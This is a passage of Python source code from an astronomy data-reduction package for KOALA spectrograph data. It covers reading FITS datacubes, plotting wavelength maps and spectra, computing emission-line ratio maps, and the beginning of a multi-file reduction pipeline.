plt.legend(frameon=True, loc=4, ncol=4)
# plt.show()
# plt.close()
interpolated_flat = interpolate.splrep(response_wavelength, fx) # , s=smooth)
self.response_curve = interpolate.splev(
self.response_wavelength, interpolated_flat, der=0
)
# plt.plot(self.response_wavelength, self.response_curve, "b-", alpha=0.5, linewidth=6, label = "Response curve (filtered)")
print(" Min wavelength at {:.2f} with value = {:.3f} /s".format(
self.response_wavelength[0], self.response_curve[0]
))
print(" Max wavelength at {:.2f} with value = {:.3f} /s".format(
self.response_wavelength[-1], self.response_curve[-1]
))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def fit_Moffat_between(self, min_wave=0, max_wave=0, r_max=5, plot=False):
"""
Parameters
----------
min_wave
max_wave
r_max
plot
Returns
-------
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
(
r2_growth_curve,
F_growth_curve,
flux,
r2_half_light,
) = self.growth_curve_between(min_wave, max_wave, plot)
flux, alpha, beta = fit_Moffat(
r2_growth_curve, F_growth_curve, flux, r2_half_light, r_max, plot
)
r2_half_light = alpha * (np.power(2.0, 1.0 / beta) - 1)
if plot:
print("Moffat fit: Flux = {:.3e},".format(flux), "HWHM = {:.3f},".format(
np.sqrt(r2_half_light) * self.pixel_size_arcsec
), "beta = {:.3f}".format(beta))
return flux, np.sqrt(r2_half_light) * self.pixel_size_arcsec, beta
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# CUBE CLASS (ANGEL + BEN) ALL OF THIS NEEDS TO BE CAREFULLY TESTED & UPDATED!
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class CUBE(RSS, Interpolated_cube):
"""
This class reads the FITS files with COMBINED datacubes.
Routines included:
- cube.map_wavelength(wavelength, contours=True)\n
- cube.plot_spectrum_cube(x,y, fcal=True)
"""
# -----------------------------------------------------------------------------
    def __init__(self, filename):
        """
        Read a COMBINED datacube FITS file and populate the cube attributes
        (data, wavelength grid, flux calibration and header metadata),
        printing a summary of what was read.

        Parameters
        ----------
        filename: string
            Path of the FITS file with the combined datacube.
        """
        # Create RSS object
        super(CUBE, self).__init__()
        print("\n> Reading combined datacube ''{}''".format(filename))
        # NOTE(review): the FITS file handle is never closed — consider using
        # fits.open(...) as a context manager.
        RSS_fits_file = fits.open(filename)  # Open file
        # General info:
        self.object = RSS_fits_file[0].header["OBJECT"]
        # self.description = self.object + ' - ' + filename
        self.description = RSS_fits_file[0].header[
            "DESCRIP"
        ]  # NOTE: it was originally "DEF"
        self.RA_centre_deg = RSS_fits_file[0].header["RAcen"]
        self.DEC_centre_deg = RSS_fits_file[0].header["DECcen"]
        self.PA = RSS_fits_file[0].header["PA"]
        # Extension 1 holds the wavelength array, extension 2 the flux
        # calibration, and the primary HDU the datacube itself.
        self.wavelength = RSS_fits_file[1].data  # TODO: why is this 1? shouldn't it be [0], maybe cause we are doing the biggest variance?
        self.flux_calibration = RSS_fits_file[2].data
        self.n_wave = len(self.wavelength)
        self.data = RSS_fits_file[0].data
        # Mean wavelength step (A per pixel) over the full coverage.
        self.wave_resolution = (self.wavelength[-1] - self.wavelength[0])/self.n_wave
        self.n_cols = RSS_fits_file[0].header["Ncols"]
        self.n_rows = RSS_fits_file[0].header["Nrows"]
        self.pixel_size_arcsec = RSS_fits_file[0].header["PIXsize"]
        self.flux_calibrated = RSS_fits_file[0].header["FCAL"]
        self.number_of_combined_files = RSS_fits_file[0].header["COFILES"]
        self.offsets_files = RSS_fits_file[0].header["OFFSETS"]
        # Summary of everything read from the file:
        print("\n Object = {}".format(self.object))
        print(" Description = {}".format(self.description))
        print(" Centre: RA = {} Deg".format(self.RA_centre_deg))
        print(" DEC = {} Deg".format(self.DEC_centre_deg))
        print(" PA = {} Deg".format(self.PA))
        print(" Size [pix] = {} x {}".format(self.n_rows, self.n_cols))
        print(" Size [arcsec] = {} x {}".format(self.n_rows * self.pixel_size_arcsec, self.n_cols * self.pixel_size_arcsec))
        print(" Pix size = {} arcsec".format(self.pixel_size_arcsec))
        print(" Files combined = {}".format(self.number_of_combined_files))
        print(" Offsets used = {}".format(self.offsets_files))
        print(" Wave Range = [ {} , {} ]".format(self.wavelength[0], self.wavelength[-1]))
        print(" Wave Resol. = {} A/pix".format(self.wave_resolution))
        print(" Flux Cal. = {}".format(self.flux_calibrated))
        print("\n> Use these parameters for acceding the data :\n")
        print(" cube.wavelength : Array with wavelengths")
        print(" cube.data[w,x,y] : Flux of the w wavelength in spaxel (x,y)")
        if self.flux_calibrated:
            print(" cube.flux_calibration : Flux calibration per wavelength [ 1 / (1E-16 * erg/cm**2/s/A) ] ")
        print("\n> Cube readed! ")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def map_wavelength(
self,
wavelength,
cmap="fuego",
fig_size=10,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
save_file="",
contours=True,
fcal=False,
):
"""
Plot map at a particular wavelength.
Parameters
----------
wavelength: float
wavelength to be mapped.
norm:
Colour scale, default = colors.PowerNorm(gamma=1./4.)\n
Log scale: norm=colors.LogNorm() \n
Lineal scale: norm=colors.Normalize().
cmap:
Color map used, default cmap="fuego"\n
Weight: cmap = "gist_gray" \n
Velocities: cmap="seismic".\n
Try also "inferno",
save_file:
(Optional) Save plot in file "file.extension"
Example
-------
>>> cube.map_wavelength(6820, contours=True, cmap="seismic")
"""
if fcal:
interpolated_map = self.data[np.searchsorted(self.wavelength, wavelength)]
else:
interpolated_map = self.data[np.searchsorted(self.wavelength, wavelength)]
title = "{} - {} $\AA$".format(self.description, wavelength)
self.plot_map(
interpolated_map,
cmap=cmap,
fig_size=fig_size,
norm=norm,
contours=contours,
save_file=save_file,
title=title,
fcal=fcal,
) # CHECK
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_map(
self,
mapa,
cmap="fuego",
fig_size=10,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
save_file="",
contours=True,
title="",
vmin=0,
vmax=1000,
fcal=False,
log=False,
clabel=False,
barlabel="",
):
"""
Plot a given map.
Parameters
----------
wavelength: float
wavelength to be mapped.
norm:
Colour scale, default = colors.PowerNorm(gamma=1./4.)\n
Log scale: norm=colors.LogNorm() \n
Lineal scale: norm=colors.Normalize().
cmap:
Color map used, default cmap="fuego"\n
Weight: cmap = "gist_gray" \n
Velocities: cmap="seismic".\n
Try also "inferno",
save_file:
(Optional) Save plot in file "file.extension"
Example
-------
>>> cube.plot_map(mapa, contours=True, cmap="seismic")
"""
fig, ax = plt.subplots(figsize=(fig_size, fig_size))
if log:
cax = ax.imshow(
mapa,
origin="lower",
interpolation="none",
norm=colors.LogNorm(vmin=vmin, vmax=vmax),
cmap=cmap,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
0.5 * self.n_rows * self.pixel_size_arcsec,
),
)
print("Map in log scale")
else:
cax = ax.imshow(
mapa,
origin="lower",
interpolation="none",
norm=norm,
cmap=cmap,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
0.5 * self.n_rows * self.pixel_size_arcsec,
),
vmin=vmin,
vmax=vmax,
)
if contours:
CS = plt.contour(
mapa,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
0.5 * self.n_rows * self.pixel_size_arcsec,
),
)
if clabel:
plt.clabel(CS, inline=1, fontsize=10)
ax.set_title(title, fontsize=fig_size * 1.3)
plt.tick_params(labelsize=fig_size)
plt.xlabel("$\Delta$ RA [arcsec]", fontsize=fig_size * 1.2)
plt.ylabel("$\Delta$ DEC [arcsec]", fontsize=fig_size * 1.2)
# plt.legend(loc='upper right', frameon=False)
plt.minorticks_on()
plt.grid(which="both", color="green")
plt.gca().invert_xaxis()
sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))
sm._A = []
cbar = fig.colorbar(sm, fraction=0.0499, pad=0.02)
# cbar = fig.colorbar(cax, fraction=0.0490, pad=0.04, norm=colors.Normalize(clip=False))
if barlabel == "":
if fcal:
barlabel = "{}".format("Integrated Flux [10$^{-16}$ erg s$^{-1}$ cm$^{-2}$]")
else:
barlabel = "{}".format("Integrated Flux [Arbitrary units]")
# if fcal:
# cbar.set_label("{}".format("Integrated Flux [10$^{-16}$ erg s$^{-1}$ cm$^{-2}$]"), rotation=270, labelpad=40, fontsize=fig_size*1.2)
# else:
# cbar.set_label("{}".format("Integrated Flux [Arbitrary units]"), rotation=270, labelpad=40, fontsize=fig_size*1.2)
cbar.set_label(barlabel, rotation=270, labelpad=20, fontsize=fig_size * 1.2)
# cbar.ax.set_yticklabels(['< -1', '0', '> 1'])# vertically oriented colorbar
# cbar.set_ticks([1.5,2,3,4,5,6], update_ticks=True)
# cbar.set_ticklabels([1.5,2,3,4,5,6])
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
#
# BEN ROUTINES
#
#
def subtractContinuum(self, spectrum):
"""
Subtract the median value from each intensity in a provided spectrum.
Parameters
----------
spectrum:
The list of intensities.
"""
med = np.nanmedian(spectrum)
for i in range(len(spectrum)):
spectrum[i] = spectrum[i] - med
if spectrum[i] < 0:
spectrum[i] = 0
return spectrum
def plot_spectrum_cube_ben(
self,
x,
y,
lmin=0,
lmax=0,
fmin=1e-30,
fmax=1e30,
fig_size=10,
save_file="",
fcal=False,
):
"""
Plot spectrum of a particular spaxel.
Parameters
----------
x, y:
coordenates of spaxel to show spectrum.
lmin, lmax:
The range of wavelengths to plot. Default is whole spectrum.
fmin, fmax:
Plot spectrum in flux range [fmin, fmax]
fcal:
Use flux calibration, default fcal=False.\n
If fcal=True, cube.flux_calibration is used.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> cube.plot_spectrum_cube_ben(20, 20, fcal=True)
"""
# Define x and y axis to plot
newWave = []
newSpectrum = []
if fcal == False:
spectrum = self.data[:, x, y]
ylabel = "Flux [relative units]"
else:
spectrum = (self.data[:, x, y]/self.flux_calibration)/1e16
# ylabel="Flux [ 10$^{-16}$ * erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
ylabel = "Flux [ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Remove NaN values from spectrum and replace them with zero.
spectrum = np.nan_to_num(spectrum)
# Subtract continuum from spectrum
subSpectrum = self.subtractContinuum(spectrum)
if fmin == 1e-30:
fmin = np.nanmin(spectrum)
if fmax == 1e30:
fmax = np.nanmax(spectrum)
# Since I can't define the correct default startpoint/endpoint within the
# function arguments section, I set them here.
if lmin == 0:
lmin = self.wavelength[0]
if lmax == 0:
lmax = self.wavelength[-1]
# Create a new list of wavelengths to plot based on the provided
# wavelength startpoint and endpoint.
for i in range(len(self.wavelength)):
if self.wavelength[i] >= lmin and self.wavelength[i] <= lmax:
newWave.append(self.wavelength[i])
newSpectrum.append(subSpectrum[i])
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(newWave, newSpectrum)
plt.ylim([fmin, fmax])
plt.xlim([lmin, lmax])
plt.minorticks_on()
title = "Spectrum of spaxel ({} , {}) in {}".format(x, y, self.description)
plt.title(title, fontsize=fig_size * 1.2)
plt.tick_params(labelsize=fig_size * 0.8)
plt.xlabel("Wavelength [$\AA$]", fontsize=fig_size * 1)
plt.ylabel(ylabel, fontsize=fig_size * 1)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
def calculateRatio(self, x, y, aStart, aEnd, bStart, bEnd, fcal=False):
"""
Given two wavelengths ranges, find the peak intensities and calculate the ratio
between them.
Parameters
----------
x, y:
The spaxel we are interested in.
aStart, aEnd:
The startpoint and endpoint of the range that the first emission line
will fall in.
bStart, bEnd:
The startpoint and endpoint of the range that the second emission line
will fall in.
"""
aFirstIndex = np.searchsorted(self.wavelength, aStart)
aLastIndex = np.searchsorted(self.wavelength, aEnd)
bFirstIndex = np.searchsorted(self.wavelength, bStart)
bLastIndex = np.searchsorted(self.wavelength, bEnd)
if fcal == False:
spectrum = self.data[:, x, y]
else:
spectrum = (self.data[:, x, y]/self.flux_calibration)/1e16
spectrum = np.nan_to_num(spectrum)
subSpectrum = self.subtractContinuum(spectrum)
aValues = []
tempIndex = aFirstIndex
while tempIndex <= aLastIndex:
aValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
aMax = np.nanmax(aValues)
bValues = []
tempIndex = bFirstIndex
while tempIndex <= bLastIndex:
bValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
bMax = np.nanmax(bValues)
return aMax/bMax
def createRatioMap(self, aStart, aEnd, bStart, bEnd, fcal=False):
xLength = len(self.data[0, :, 0])
yLength = len(self.data[0, 0, :])
aFirstIndex = np.searchsorted(self.wavelength, aStart)
aLastIndex = np.searchsorted(self.wavelength, aEnd)
bFirstIndex = np.searchsorted(self.wavelength, bStart)
bLastIndex = np.searchsorted(self.wavelength, bEnd)
ratioMap = [[i for i in range(yLength)] for j in range(xLength)]
for y in range(yLength):
print("Column {}".format(y))
for x in range(xLength):
if fcal == False:
spectrum = self.data[:, x, y]
else:
spectrum = (self.data[:, x, y]/self.flux_calibration)/1e16
spectrum = np.nan_to_num(spectrum)
subSpectrum = self.subtractContinuum(spectrum)
subAvg = np.average(subSpectrum)
aValues = []
tempIndex = aFirstIndex
while tempIndex <= aLastIndex:
aValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
aMax = np.nanmax(aValues)
bValues = []
tempIndex = bFirstIndex
while tempIndex <= bLastIndex:
bValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
bMax = np.nanmax(bValues)
if aMax > subAvg and bMax > subAvg:
ratio = aMax/bMax
else:
ratio = 0
ratioMap[x][y] = ratio
return ratioMap
# -----------------------------------------------------------------------------
# MACRO FOR EVERYTHING 19 Sep 2019, including alignment 2-10 cubes
# -----------------------------------------------------------------------------
class KOALA_reduce(RSS, Interpolated_cube): # TASK_KOALA_reduce
def __init__(
self,
rss_list,
fits_file="",
obj_name="",
description="",
do_rss=True,
do_cubing=True,
do_alignment=True,
make_combined_cube=True,
rss_clean=False,
save_rss_to_fits_file_list=["", "", "", "", "", "", "", "", "", ""],
save_aligned_cubes=False,
# RSS
# skyflat_file is a RSS, skyflat and skyflat_list are the names of objects keeping the relative throughput of skyflats
apply_throughput=True,
skyflat="",
skyflat_file="",
flat="",
skyflat_list=["", "", "", "", "", "", "", "", "", ""],
# This line is needed if doing FLAT when reducing (NOT recommended)
plot_skyflat=False,
wave_min_scale=0,
wave_max_scale=0,
ymin=0,
ymax=0,
# Correct CCD defects & high cosmics
correct_ccd_defects=False,
correct_high_cosmics=False,
clip_high=100,
step_ccd=50,
remove_5578=False,
plot_suspicious_fibres=False,
# Correct for small shofts in wavelength
fix_wavelengths=False,
sol=[0, 0, 0],
# Correct for extinction
do_extinction=True,
# Sky substraction
sky_method="self",
n_sky=50,
sky_fibres=[1000], # do_sky=True
sky_spectrum=[0],
sky_rss=[0],
scale_sky_rss=0,
scale_sky_1D=0,
correct_negative_sky=False,
auto_scale_sky=False,
sky_wave_min=0,
sky_wave_max=0,
cut_sky=5.0,
fmin=1,
fmax=10,
individual_sky_substraction=False,
fibre_list=[100, 200, 300, 400, 500, 600, 700, 800, 900],
sky_list=[[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]],
# Telluric correction
telluric_correction=[0],
telluric_correction_list=[[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]],
# Identify emission lines
id_el=False,
high_fibres=10,
brightest_line="Ha",
cut=1.5,
plot_id_el=True,
broad=2.0,
id_list=[0],
brightest_line_wavelength=0,
# Clean sky residuals
clean_sky_residuals=False,
dclip=3.0,
extra_w=1.3,
step_csr=25,
# CUBING
pixel_size_arcsec=0.4, # NOTE: changed pixel_size_arcsec to kernel_size to fix name errors
kernel_size_arcsec=1.2, # NOTE: changed kernel_size_arcsec to kernel_size to fix name errors
offsets=[1000],
ADR=False,
flux_calibration=[0],
flux_calibration_list=[[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]],
# COMMON TO RSS AND CUBING
valid_wave_min=0,
valid_wave_max=0,
plot=True,
norm=colors.LogNorm(),
fig_size=12,
warnings=False,
verbose=False,
):
"""
Example
-------
>>> combined_KOALA_cube(['Ben/16jan10049red.fits','Ben/16jan10050red.fits','Ben/16jan10051red.fits'],
fits_file="test_BLUE_reduced.fits", skyflat_file='Ben/16jan10086red.fits',
pixel_size_arcsec=.3, kernel_size_arcsec=1.5, flux_calibration=flux_calibration,
plot= True)
"""
print("\n\n\n======================= REDUCING KOALA data =======================\n\n")
n_files = len(rss_list)
sky_rss_list = [[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]]
pk = ("_{}p{}_{}k{}".format(
int(pixel_size_arcsec), int((abs(pixel_size_arcsec) - abs(int(pixel_size_arcsec))) * 10),
int(kernel_size_arcsec), int((abs(kernel_size_arcsec) - abs(int(kernel_size_arcsec))) * 100)
)
)
print(" 1. Checking input values: ")
print("\n - Using the following RSS files : ")
for rss in range(n_files):
print(" ", rss + 1, ". : ", rss_list[rss])
self.rss_list = rss_list
if rss_clean:
print("\n - These RSS files are ready to be cubed & combined, no further process required ...")
else:
if skyflat == "" and skyflat_list[0] == "" and skyflat_file == "":
print("\n - No skyflat file considered, no throughput correction will be applied.")
else:
if skyflat_file == "":
print("\n - Using skyflat to consider throughput correction ...")
if skyflat != "":
for i in range(n_files):
skyflat_list[i] = skyflat
print(" Using same skyflat for all object files")
else:
print(" List of skyflats provided!")
else:
print("\n - Using skyflat file to derive the throughput correction ...") # This assumes skyflat_file is the same for all the objects
skyflat = KOALA_RSS(
skyflat_file,
do_sky=False,
do_extinction=False,
apply_throughput=False,
plot=True,
)
skyflat.find_relative_throughput(
ymin=ymin,
ymax=ymax,
wave_min_scale=wave_min_scale,
wave_max_scale=wave_max_scale,
plot=plot_skyflat,
)
for i in range(n_files):
skyflat_list[i] = skyflat
print(" - Using same skyflat for all object files")
# sky_method = "self" "1D" "2D" "none" #1Dfit"
if sky_method == "1D" or sky_method == "1Dfit":
if np.nanmedian(sky_spectrum) != 0:
for i in range(n_files):
sky_list[i] = sky_spectrum
print("\n - Using same 1D sky spectrum provided for all object files")
else:
if np.nanmedian(sky_list[0]) == 0:
print("\n - 1D sky spectrum requested but not found, assuming n_sky = 50 from the same files")
sky_method = "self"
else:
print("\n - List of 1D sky spectrum provided for each object file")
if sky_method == "2D":
try:
if np.nanmedian(sky_list[0].intensity_corrected) != 0:
print("\n - List of 2D sky spectra provided for each object file")
for i in range(n_files):
sky_rss_list[i] = sky_list[i]
sky_list[i] = [0]
except Exception:
try:
if sky_rss == 0:
print("\n - 2D sky spectra requested but not found, assuming n_sky = 50 from the same files")
sky_method = "self"
except Exception:
for i in range(n_files):
sky_rss_list[i] = sky_rss
print("\n - Using same 2D sky spectra provided for all object files")
if sky_method == "self":
for i in range(n_files):
sky_list[i] = 0
if n_sky == 0:
n_sky = 50
if sky_fibres[0] == 1000:
print("\n - Using n_sky =", n_sky, "to create a sky spectrum")
else:
print("\n - Using n_sky =", n_sky, "and sky_fibres =", sky_fibres, "to create a sky spectrum")
if (
np.nanmedian(telluric_correction) == 0
and np.nanmedian(telluric_correction_list[0]) == 0
):
print("\n - No telluric correction considered")
else:
if np.nanmedian(telluric_correction_list[0]) == 0:
for i in range(n_files):
telluric_correction_list[i] = telluric_correction
print("\n - Using same telluric correction for all object files")
else:
print("\n - List of telluric corrections provided!")
if do_rss:
print("\n 2. Reading the data stored in rss files ...")
self.rss1 = KOALA_RSS(
rss_list[0],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[0],
apply_throughput=apply_throughput,
skyflat=skyflat_list[0],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[0],
sky_rss=sky_rss_list[0],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[0],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 1:
self.rss2 = KOALA_RSS(
rss_list[1],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[1],
apply_throughput=apply_throughput,
skyflat=skyflat_list[1],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[1],
sky_rss=sky_rss_list[1],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[1],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 2:
self.rss3 = KOALA_RSS(
rss_list[2],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[2],
apply_throughput=apply_throughput,
skyflat=skyflat_list[2],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[2],
sky_rss=sky_rss_list[2],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[2],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 3:
self.rss4 = KOALA_RSS(
rss_list[3],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[3],
apply_throughput=apply_throughput,
skyflat=skyflat_list[3],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[3],
sky_rss=sky_rss_list[3],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[3],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 4:
self.rss5 = KOALA_RSS(
rss_list[4],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[4],
apply_throughput=apply_throughput,
skyflat=skyflat_list[4],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[4],
sky_rss=sky_rss_list[4],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[4],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 5:
self.rss6 = KOALA_RSS(
rss_list[5],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[5],
apply_throughput=apply_throughput,
skyflat=skyflat_list[5],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[5],
sky_rss=sky_rss_list[5],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[5],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 6:
self.rss7 = KOALA_RSS(
rss_list[6],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[6],
apply_throughput=apply_throughput,
skyflat=skyflat_list[6],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[6],
sky_rss=sky_rss_list[6],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[6],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 7:
self.rss8 = KOALA_RSS(
rss_list[7],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[7],
apply_throughput=apply_throughput,
skyflat=skyflat_list[7],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
